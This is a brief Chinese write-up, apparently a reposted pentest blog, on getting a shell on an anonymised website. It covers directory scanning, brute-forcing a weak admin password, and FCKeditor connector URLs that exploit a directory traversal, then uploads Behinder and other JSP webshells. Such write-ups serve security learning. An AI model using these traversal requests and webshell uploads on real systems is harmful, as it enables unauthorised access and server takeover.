一次峰回路轉的getshell


掃目錄發現 http://www.xxx.test.cn/bak/以及/bak/upload.jsp
 
上傳抓包看返回包,沒有回顯路徑
於是盲猜找上傳文件夾,無果。回到bak目錄發現可疑js
訪問bak/login_js/login.js   找到一處后台地址
訪問/bak/admin_manager1/index.jsp跳轉到
隨手猜測/bak/ms_login.jsp找到后台
爆破弱口令進去后台,發現后台功能簡單,沒有上傳,也沒有未授權,SQL注入之類
查看首頁源代碼
發現沒有什么值得注意的也沒有js繼續跟進文件查看源代碼最終在/bak/admin_manager1/sys/update_password.jsp下右鍵源代碼看到fck
查看fck版本,嘗試漏洞,無果,發現存在fck目錄遍歷的漏洞
/bak/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/
到上一級目錄 
/bak/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../
 
到/bak/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../AlanX_Upload_Folder
發現此處為一開始upload.jsp上傳文件目錄,於是上傳冰蠍馬404,上傳大馬成功,后來發現上傳的jsp文件必須要訪問的時候有內容打印出來,才不會404實際上之前上傳的冰一樣可以連接
 
 
 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM